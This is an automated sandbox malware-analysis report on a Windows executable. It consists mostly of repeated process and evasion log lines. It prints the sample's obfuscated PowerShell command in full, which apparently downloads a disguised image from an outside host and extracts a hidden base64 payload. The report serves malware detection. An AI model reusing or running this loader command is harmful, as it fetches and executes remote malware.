        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1790Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1369Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5276Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4559Jump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2610
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5396Thread sleep count: 1790 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232Thread sleep count: 1369 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep count: 95 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2024Thread sleep count: 5276 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2024Thread sleep count: 4559 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344Thread sleep time: -18446744073709540s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD212034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF6FD212034
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD216710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF6FD216710
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD211D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6FD211D10
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD218A1E SetUnhandledExceptionFilter,0_2_00007FF6FD218A1E
        Source: C:\Users\user\Desktop\nTHivMbGpg.exeCode function: 0_2_00007FF6FD218714 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6FD218714

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_2412.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3724, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2412, type: MEMORYSTR
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#CJump to behavior
